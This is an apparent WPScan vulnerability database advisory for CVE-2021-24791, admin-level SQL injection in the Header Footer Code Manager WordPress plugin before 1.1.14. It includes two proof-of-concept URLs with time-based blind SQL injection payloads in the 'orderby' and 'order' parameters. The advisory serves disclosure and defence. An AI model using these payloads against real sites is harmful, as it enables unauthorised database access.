logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

Header Footer Code Manager < 1.1.14 - Admin+ SQL Injections

Description

The plugin does not validate and escape the "orderby" and "order" request parameters before using them in a SQL statement when viewing the Snippets admin dashboard, leading to SQL injections

Proof of Concept

https://example.com/wp-admin/admin.php?page=hfcm-list&orderby=%28SELECT+5619+FROM+%28SELECT%28SLEEP%2810%29%29%29uWCv%29&order=DESC

https://example.com/wp-admin/admin.php?page=hfcm-list&orderby=name&order=+AND+%28SELECT+9933+FROM+%28SELECT%28SLEEP%2810%29%29%29wbfm%29

Affects Plugins

header-footer-code-manager

Fixed in version 1.1.14

References

CVE

CVE-2021-24791

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

Miscellaneous

Original Researcher

bl4derunner

Submitter

Anton Sarsadskikh

Verified

Yes

WPVDB ID

d55caa9b-d50f-4c13-bc69-dc475641735f

Timeline

Publicly Published

2021-10-11 (about 3 months ago)

Added

2021-10-11 (about 3 months ago)

Last Updated

2021-10-11 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin